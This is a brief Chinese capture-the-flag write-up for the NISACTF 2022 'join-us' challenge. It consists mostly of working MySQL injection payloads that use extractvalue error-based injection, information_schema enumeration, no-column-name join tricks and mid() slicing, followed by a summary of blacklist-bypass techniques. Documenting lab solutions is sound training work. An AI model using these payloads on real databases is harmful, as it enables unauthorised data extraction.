[NISACTF 2022]
题源:https://www.ctfer.vip/#/problem/2034
题目:join-us
-1' || (select*from ANTONIE)#
-1' || extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema like 'sqlsql')))#
-1' || extractvalue(1,concat(0x5c,(select*from (select*from output a join output b)c)))#
-1' || extractvalue(1,mid(concat(0x7e,(select data from output)),1,30))#
-1' || extractvalue(1,mid(concat(0x7e,(select data from output)),10,40))#
总结
所用知识点:
注入检测fuzz;
黑名单绕过(‘||’、extractvalue、like);sys应该也可但没试
无列名注入;
sql中mid函数截取。
